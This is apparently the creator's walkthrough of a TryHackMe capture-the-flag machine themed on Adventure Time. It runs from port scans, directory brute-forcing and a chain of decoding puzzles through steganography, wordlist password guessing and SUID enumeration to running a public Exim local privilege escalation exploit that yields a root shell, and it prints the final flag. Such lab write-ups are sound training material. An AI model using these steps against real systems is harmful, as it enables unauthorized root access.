6 July 2022

Pentesting Fun Stuff

following the cyber security path…

Adventure Time

Description

A CTF based challenge with a lot of puzzles I created for TryHackMe. It isn’t a real-world challenge, but for the puzzler it’s a nice brainteaser.
This write-up is a guide for those who got stuck along the way.

root@lab:~/THM/AdventureTime# nmap -T4 -sS -sV -sC -p- 192.168.245.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 17:10 CEST
Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 17:11 (0:00:22 remaining)
Nmap scan report for 192.168.245.132
Host is up (0.0010s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r--    1 ftp      ftp       1401357 Sep 21 14:51 1.jpg
| -r--r--r--    1 ftp      ftp        233977 Sep 21 14:51 2.jpg
| -r--r--r--    1 ftp      ftp        524615 Sep 21 14:51 3.jpg
| -r--r--r--    1 ftp      ftp        771076 Sep 21 14:52 4.jpg
| -r--r--r--    1 ftp      ftp       1644395 Sep 21 14:52 5.jpg
|_-r--r--r--    1 ftp      ftp         40355 Sep 21 14:53 6.jpg
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.245.129
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 58:d2:86:99:c2:62:2d:95:d0:75:9c:4e:83:b6:1b:ca (RSA)
|   256 db:87:9e:06:43:c7:6e:00:7b:c3:bc:a1:97:dd:5e:83 (ECDSA)
|_  256 6b:40:84:e6:9c:bc:1c:a8:de:b2:a1:8b:a3:6a:ef:f0 (ED25519)
80/tcp    open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
443/tcp   open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: You found Finn
| ssl-cert: Subject: commonName=adventure-time.com/organizationName=Candy Corporate Inc./stateOrProvinceName=Candy Kingdom/countryName=CK
| Not valid before: 2019-09-20T08:29:36
|_Not valid after:  2020-09-19T08:29:36
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
31337/tcp open  Elite?
| fingerprint-strings: 
|   DNSStatusRequestTCP, RPCCheck, SSLSessionReq: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not
|   DNSVersionBindReqTCP: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not 
|     version
|     bind
|   GenericLines, NULL: 
|     Hello Princess Bubblegum. What is the magic word?
|   GetRequest: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not GET / HTTP/1.0
|   HTTPOptions: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS / HTTP/1.0
|   Help: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not HELP
|   RTSPRequest: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS / RTSP/1.0
|   SIPOptions: 
|     Hello Princess Bubblegum. What is the magic word?
|     magic word is not OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: <sip:nm@nm>;tag=root
|     <sip:nm2@nm2>
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: <sip:nm@nm>
|_    Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=9/23%Time=5D88E057%P=x86_64-pc-linux-gnu%r(N
SF:ULL,32,"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\
SF:x20word\?\n")%r(GetRequest,57,"Hello\x20Princess\x20Bubblegum\.\x20What
SF:\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20word\x20is\x20not\x20
SF:GET\x20/\x20HTTP/1\.0\n")%r(SIPOptions,124,"Hello\x20Princess\x20Bubble
SF:gum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20word\x20
SF:is\x20not\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20n
SF:m;branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r
SF:\nCall-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\
SF:nContent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicat
SF:ion/sdp\n")%r(GenericLines,32,"Hello\x20Princess\x20Bubblegum\.\x20What
SF:\x20is\x20the\x20magic\x20word\?\n")%r(HTTPOptions,5B,"Hello\x20Princes
SF:s\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\
SF:x20word\x20is\x20not\x20OPTIONS\x20/\x20HTTP/1\.0\n")%r(RTSPRequest,5B,
SF:"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word
SF:\?\nThe\x20magic\x20word\x20is\x20not\x20OPTIONS\x20/\x20RTSP/1\.0\n")%
SF:r(RPCCheck,75,"Hello\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x2
SF:0magic\x20word\?\nThe\x20magic\x20word\x20is\x20not\x20\x80\0\0\(r\xfe\
SF:x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\n")%r(DNSVersionBindReqTCP,69,"Hello\x20Princess\x
SF:20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20
SF:word\x20is\x20not\x20\0\x1e\0\x06\x01\0\0\x01\0\0\0\0\0\0\x07version\x0
SF:4bind\0\0\x10\0\x03\n")%r(DNSStatusRequestTCP,57,"Hello\x20Princess\x20
SF:Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe\x20magic\x20wo
SF:rd\x20is\x20not\x20\0\x0c\0\0\x10\0\0\0\0\0\0\0\0\0\n")%r(Help,4D,"Hell
SF:o\x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nT
SF:he\x20magic\x20word\x20is\x20not\x20HELP\n")%r(SSLSessionReq,A1,"Hello\
SF:x20Princess\x20Bubblegum\.\x20What\x20is\x20the\x20magic\x20word\?\nThe
SF:\x20magic\x20word\x20is\x20not\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\xd7\x
SF:f7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=
SF:\xdbo\xef\x10n\0\0\(\0\x16\0\x13\0\n\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0
SF:\x15\0\x12\0\t\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0\n");
MAC Address: 00:50:56:24:A0:1F (VMware)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.02 seconds

 

oot@lab:~/THM/AdventureTime# gobuster dir -u https://192.168.245.132 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://192.168.245.132
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200
[+] User Agent:     gobuster/3.0.1
[+] Add Slash:      true
[+] Timeout:        10s
===============================================================
2019/09/23 17:12:05 Starting gobuster
===============================================================
/candybar/ (Status: 200)
===============================================================
2019/09/23 17:12:32 Finished
===============================================================

<!-- KBQWY4DONAQHE53UOJ5CA2LXOQQEQSCBEBZHIZ3JPB2XQ4TQNF2CA5LEM4QHEYLKORUC4=== -->

BASE32 > ROT11

Always check the SSL certificate for clues.

oot@lab:~/THM/AdventureTime# cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	lab
192.168.245.132	adventure-time.com land-of-ooo.com

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://land-of-ooo.com/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200
[+] User Agent:     gobuster/3.0.1
[+] Add Slash:      true
[+] Timeout:        10s
===============================================================
2019/09/23 17:20:41 Starting gobuster
===============================================================
/yellowdog/ (Status: 200)
===============================================================
2019/09/23 17:21:10 Finished
===============================================================

root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com/yellowdog/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://land-of-ooo.com/yellowdog/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200
[+] User Agent:     gobuster/3.0.1
[+] Add Slash:      true
[+] Timeout:        10s
===============================================================
2019/09/23 17:23:17 Starting gobuster
===============================================================
/bananastock/ (Status: 200)
===============================================================
2019/09/23 17:23:44 Finished
===============================================================

<!-- _/..../.\_.../._/_./._/_./._/...\._/._./.\_/..../.\_..././.../_/_._.__/_._.__/_._.__ -->

MORSE (fwd slash + bck slash)

THE BANANAS ARE THE BEST!!!
root@lab:~/THM/AdventureTime# gobuster dir -u https://land-of-ooo.com/yellowdog/bananastock/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -k -f -s 200
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://land-of-ooo.com/yellowdog/bananastock/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200
[+] User Agent:     gobuster/3.0.1
[+] Add Slash:      true
[+] Timeout:        10s
===============================================================
2019/09/23 17:25:54 Starting gobuster
===============================================================
/princess/ (Status: 200)
===============================================================
2019/09/23 17:26:25 Finished
===============================================================

    <!--
    Secrettext = 0008f1a92d287b48dccb5079eac18ad2a0c59c22fbc7827295842f670cdb3cb645de3de794320af132ab341fe0d667a85368d0df5a3b731122ef97299acc3849cc9d8aac8c3acb647483103b5ee44166
    Key = my cool password
    IV = abcdefghijklmanopqrstuvwxyz
    Mode = CBC
    Input = hex
    Output = raw
    -->

AES decrypt

the magic safe is accessibel at port 31337. the magic word is: ricardio
root@lab:~/THM/AdventureTime# nc adventure-time.com 31337
Hello Princess Bubblegum. What is the magic word?
ricardio
The new username is: apple-guards
root@lab:~/THM/AdventureTime# ssh apple-guards@adventure-time.com
The authenticity of host 'adventure-time.com (192.168.245.132)' can't be established.
ECDSA key fingerprint is SHA256:xbyqQlD2bMFloDbi6VJNgAlut193WbcnAnRm+ZWvRyE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'adventure-time.com,192.168.245.132' (ECDSA) to the list of known hosts.
apple-guards@adventure-time.com's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

1 package can be updated.
0 updates are security updates.

No mail.
Last login: Sat Sep 21 20:51:11 2019 from 192.168.245.129
apple-guards@at:~$ 
apple-guards@at:~$ cat mbox
From marceline@at  Fri Sep 20 16:39:54 2019
Return-Path: <marceline@at>
X-Original-To: apple-guards@at
Delivered-To: apple-guards@at
Received: by at.localdomain (Postfix, from userid 1004)
	id 6737B24261C; Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
Subject: Need help???
To: <apple-guards@at>
X-Mailer: mail (GNU Mailutils 3.4)
Message-Id: <20190920143954.6737B24261C@at.localdomain>
Date: Fri, 20 Sep 2019 16:39:54 +0200 (CEST)
From: marceline@at

Hi there bananaheads!!!
I heard Princess B revoked your access to the system. Bummer!
But I'll help you guys out.....doesn't cost you a thing.....well almost nothing.

I hid a file for you guys. If you get the answer right, you'll get better access.
Good luck!!!!
apple-guards@at:~$ find / -user marceline -type f 2>/dev/null
/etc/fonts/helper
apple-guards@at:~$ ls -ld /etc/fonts/helper
-rwxr-x--- 1 marceline apple-guards 16616 sep 20 17:35 /etc/fonts/helper
apple-guards@at:~$ file /etc/fonts/helper
/etc/fonts/helper: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=6cee442f66f3fb132491368c671c1cf91fc28332, for GNU/Linux 3.2.0, not stripped
apple-guards@at:~$ /etc/fonts/helper


======================================
      BananaHead Access Pass          
       created by Marceline           
======================================

Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha

Ready for the question?

The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse

Did you solve the puzzle?

Gpnhkse > vigenere + key = gone > Abadeer

======================================
      BananaHead Access Pass          
       created by Marceline           
======================================

Hi there bananaheads!!!
So you found my file?
But it won't help you if you can't answer this question correct.
What? I told you guys I would help and that it wouldn't cost you a thing....
Well I lied hahahaha

Ready for the question?

The key to solve this puzzle is gone
And you need the key to get this readable: Gpnhkse

Did you solve the puzzle? yes

What is the word I'm looking for? Abadeer

That's it!!!! You solved my puzzle
Don't tell princess B I helped you guys!!!
My password is 'My friend Finn'
marceline@at:~$ cat I-got-a-secret.txt 
Hello Finn,

I heard that you pulled a fast one over the banana guards.
B was very upset hahahahaha.
I also heard you guys are looking for BMO's resetcode.
You guys broke him again with those silly games?

You know I like you Finn, but I don't want to anger B too much.
So I will help you a little bit...

But you have to solve my little puzzle. Think you're up for it?
Hahahahaha....I know you are.

111111111100100010101011101011111110101111111111011011011011000001101001001011111111111111001010010111100101000000000000101001101111001010010010111111110010100000000000000000000000000000000000000010101111110010101100101000000000000000000000101001101100101001001011111111111111111111001010000000000000000000000000001010111001010000000000000000000000000000000000000000000001010011011001010010010111111111111111111111001010000000000000000000000000000000001010111111001010011011001010010111111111111100101001000000000000101001111110010100110010100100100000000000000000000010101110010100010100000000000000010100000000010101111100101001111001010011001010010000001010010100101011100101001101100101001011100101001010010100110110010101111111111111111111111111111111110010100100100000000000010100010100111110010100000000000000000000000010100111111111111111110010100101111001010000000000000001010

Spoon encoding

The magic word you are looking for is ApplePie
root@lab:~/THM/AdventureTime# nc adventure-time.com 31337
Hello Princess Bubblegum. What is the magic word?
ApplePie
The password of peppermint-butler is: That Black Magic
marceline@at:~$ su peppermint-butler 
Password: 
peppermint-butler@at:/home/marceline$ cd
peppermint-butler@at:~$ ls -lah
total 116K
drwxr-x---  4 peppermint-butler peppermint-butler 4,0K sep 23 13:56 .
drwxr-xr-x 10 root              root              4,0K sep 20 20:53 ..
-rw-r--r--  1 peppermint-butler peppermint-butler  220 apr  4  2018 .bash_logout
-rw-r--r--  1 peppermint-butler peppermint-butler 3,7K apr  4  2018 .bashrc
-rw-------  1 peppermint-butler peppermint-butler  84K sep 21 11:44 butler-1.jpg
drwx------  2 peppermint-butler peppermint-butler 4,0K sep 20 21:16 .cache
-rw-r-----  1 peppermint-butler peppermint-butler   28 sep 22 11:04 flag3
drwx------  3 peppermint-butler peppermint-butler 4,0K sep 20 21:16 .gnupg
-rw-r--r--  1 peppermint-butler peppermint-butler  807 apr  4  2018 .profile
root@lab:~/THM/AdventureTime# scp peppermint-butler@adventure-time.com:/home/peppermint-butler/butler-1.jpg .
peppermint-butler@adventure-time.com's password: 
butler-1.jpg
root@lab:~/THM/AdventureTime# steghide extract -sf butler-1.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!
peppermint-butler@at:~$ find / -user peppermint-butler -type f 2>/dev/null | \grep -v -e '/home\|/proc' | xargs ls -ld
-rw-r----- 1 peppermint-butler peppermint-butler 299 sep 21 11:52 /etc/php/zip.txt
-rw-r----- 1 peppermint-butler peppermint-butler 300 sep 21 11:50 /usr/share/xml/steg.txt
peppermint-butler@at:~$ find / -user peppermint-butler -type f 2>/dev/null | \grep -v -e '/home\|/proc' | xargs cat
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum,
but I don't trust her.

So I need to keep this safe.

The password of my secret file is 'ToKeepASecretSafe'
I need to keep my secrets safe.
There are people in this castle who can't be trusted.
Those banana guards are not the smartest of guards.
And that Marceline is a friend of princess Bubblegum,
but I don't trust her.

So I need to keep this safe.

The password of my secret file is 'ThisIsReallySave'
root@lab:~/THM/AdventureTime# steghide extract -sf butler-1.jpg 
Enter passphrase: 
wrote extracted data to "secrets.zip".
root@lab:~/THM/AdventureTime# unzip secrets.zip
Archive:  secrets.zip
[secrets.zip] secrets.txt password: 
 extracting: secrets.txt
root@lab:~/THM/AdventureTime# cat secrets.txt 
[0200 hours][upper stairs]
I was looking for my arch nemesis Peace Master, 
but instead I saw that cowering little puppet from the Ice King.....gunter.
What was he up to, I don't know.
But I saw him sneaking in the secret lab of Princess Bubblegum.
To be able to see what he was doing I used my spell 'the evil eye' and saw him.
He was hacking the secret laptop with something small like a duck of rubber.
I had to look closely, but I think I saw him type in something.
It was unclear, but it was something like 'The Ice King s????'.
The last 4 letters where a blur.

Should I tell princess Bubblegum or see how this all plays out?
I don't know....... 
root@lab:~/THM/AdventureTime# crunch 18 18 -t 'The Ice King s@@@@' > wordlist.txt
Crunch will now generate the following amount of data: 8682544 bytes
8 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 456976

peppermint-butler@at:~$ su gunter
Password: 
gunter@at:~$ id
uid=1007(gunter) gid=1007(gunter) groups=1007(gunter),1012(gcc)
gunter@at:~$ ss -tupan
Netid              State                Recv-Q               Send-Q                                  Local Address:Port                                   Peer Address:Port                
udp                UNCONN               0                    0                                             0.0.0.0:631                                         0.0.0.0:*                   
udp                UNCONN               0                    0                                       127.0.0.53%lo:53                                          0.0.0.0:*                   
udp                UNCONN               0                    0                                             0.0.0.0:68                                          0.0.0.0:*                   
udp                UNCONN               0                    0                                             0.0.0.0:35972                                       0.0.0.0:*                   
udp                UNCONN               0                    0                                             0.0.0.0:5353                                        0.0.0.0:*                   
udp                UNCONN               0                    0                                                [::]:46415                                          [::]:*                   
udp                UNCONN               0                    0                                                [::]:5353                                           [::]:*                   
tcp                LISTEN               0                    128                                     127.0.0.53%lo:53                                          0.0.0.0:*                   
tcp                LISTEN               0                    128                                           0.0.0.0:22                                          0.0.0.0:*                   
tcp                LISTEN               0                    5                                           127.0.0.1:631                                         0.0.0.0:*                   
tcp                LISTEN               0                    20                                          127.0.0.1:60000                                       0.0.0.0:*                   
tcp                LISTEN               0                    25                                            0.0.0.0:31337                                       0.0.0.0:*                   
tcp                LISTEN               0                    80                                          127.0.0.1:3306                                        0.0.0.0:*                   
tcp                ESTAB                0                    0                                     192.168.245.132:22                                  192.168.245.129:52778               
tcp                LISTEN               0                    128                                                 *:80                                                *:*                   
tcp                LISTEN               0                    32                                                  *:21                                                *:*                   
tcp                LISTEN               0                    128                                              [::]:22                                             [::]:*                   
tcp                LISTEN               0                    5                                               [::1]:631                                            [::]:*                   
tcp                LISTEN               0                    128                                                 *:443                                               *:*
gunter@at:~$ find / -perm /4000 -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/xorg/Xorg.wrap
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/arping
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/vmware-user-suid-wrapper
/usr/bin/sudo
/bin/ping
/bin/umount
/bin/su
/bin/fusermount
/bin/mount

Adjust port 25 > port 60000

root@lab:~/THM/AdventureTime# scp exim.sh gunter@adventure-time.com:/home/gunter/
gunter@adventure-time.com's password: 
exim.sh
gunter@at:~$ bash exim.sh

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...

Delivering setuid payload...
220 at ESMTP Exim 4.90_1 Ubuntu Mon, 23 Sep 2019 20:12:32 +0200
250 at Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1iCSp6-00015g-FT
221 at closing connection

Waiting 5 seconds...
-rwsr-xr-x 1 root gunter 8504 sep 23 20:12 /tmp/pwned
# id
uid=0(root) gid=0(root) groups=0(root),1007(gunter),1012(gcc)
# bash
root@at:~# cd /home/bubblegum/
root@at:/home/bubblegum# ls -lah
total 120K
drwxr-x--- 18 bubblegum bubblegum 4,0K sep 23 13:57 .
drwxr-xr-x 10 root      root      4,0K sep 20 20:53 ..
-rw-------  1 bubblegum bubblegum  725 sep 23 13:57 .bash_history
-rw-r--r--  1 bubblegum bubblegum  220 apr  4  2018 .bash_logout
-rw-r--r--  1 bubblegum bubblegum 3,7K apr  4  2018 .bashrc
drwx------ 15 bubblegum bubblegum 4,0K sep 20 17:15 .cache
drwx------ 12 bubblegum bubblegum 4,0K sep 20 08:45 .config
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Desktop
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Documents
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Downloads
drwx------  3 bubblegum bubblegum 4,0K sep 18 19:40 .gnupg
-rw-------  1 bubblegum bubblegum 3,6K sep 23 13:39 .ICEauthority
drwx------  3 bubblegum bubblegum 4,0K sep 18 19:39 .local
drwx------  5 bubblegum bubblegum 4,0K sep 18 21:20 .mozilla
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Music
-rw-------  1 root      root       183 sep 18 21:11 .mysql_history
drwxrwxr-x  3 bubblegum bubblegum 4,0K sep 20 19:26 nmap
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Pictures
-rw-r--r--  1 bubblegum bubblegum  807 apr  4  2018 .profile
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Public
drwxrwxr-x  2 bubblegum bubblegum 4,0K sep 22 10:54 Secrets
-rwxrwx---  1 bubblegum bubblegum 1,6K sep 21 14:41 secretServer.py
drwx------  2 bubblegum bubblegum 4,0K sep 18 19:40 .ssh
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Templates
drwxr-xr-x  2 bubblegum bubblegum 4,0K sep 18 19:39 Videos
-rw-------  1 root      root       13K sep 23 13:46 .viminfo
-rw-rw-r--  1 bubblegum bubblegum  163 sep 20 19:26 .wget-hsts
root@at:/home/bubblegum# cd Secrets/
root@at:/home/bubblegum/Secrets# ls -lah
total 12K
drwxrwxr-x  2 bubblegum bubblegum 4,0K sep 22 10:54 .
drwxr-x--- 18 bubblegum bubblegum 4,0K sep 23 13:57 ..
-rw-r-----  1 bubblegum bubblegum 3,1K sep 22 10:54 bmo.txt
root@at:/home/bubblegum/Secrets# cat bmo.txt 



░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░▄██████████████████████▄░░░░
░░░░█░░░░░░░░░░░░░░░░░░░░░░█░░░░
░░░░█░▄██████████████████▄░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░░░░█░█░░█░░░░░░░░░░░░█░░█░█░░░░
░░░░█░█░░░░░▄▄▄▄▄▄▄▄░░░░░█░█░░░░
░░░░█░█░░░░░▀▄░░░░▄▀░░░░░█░█░░░░
░░░░█░█░░░░░░░▀▀▀▀░░░░░░░█░█░░░░
░░░░█░█░░░░░░░░░░░░░░░░░░█░█░░░░
░█▌░█░▀██████████████████▀░█░▐█░
░█░░█░░░░░░░░░░░░░░░░░░░░░░█░░█░
░█░░█░████████████░░░░░██░░█░░█░
░█░░█░░░░░░░░░░░░░░░░░░░░░░█░░█░
░█░░█░░░░░░░░░░░░░░░▄░░░░░░█░░█░
░▀█▄█░░░▐█▌░░░░░░░▄███▄░██░█▄█▀░
░░░▀█░░█████░░░░░░░░░░░░░░░█▀░░░
░░░░█░░░▐█▌░░░░░░░░░▄██▄░░░█░░░░
░░░░█░░░░░░░░░░░░░░▐████▌░░█░░░░
░░░░█░▄▄▄░▄▄▄░░░░░░░▀██▀░░░█░░░░
░░░░█░░░░░░░░░░░░░░░░░░░░░░█░░░░
░░░░▀██████████████████████▀░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░░██░░░░░░░░░░░░██░░░░░░░░
░░░░░░░▐██░░░░░░░░░░░░██▌░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░


Secret project number: 211243A
Name opbject: BMO
Rol object: Spy

In case of emergency use resetcode: tryhackme{Th1s1s4c0d3F0rBM0}


-------

Good job on getting this code!!!!
You solved all the puzzles and tried harder to the max.
If you liked this CTF, give a shout out to @n0w4n.


 

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.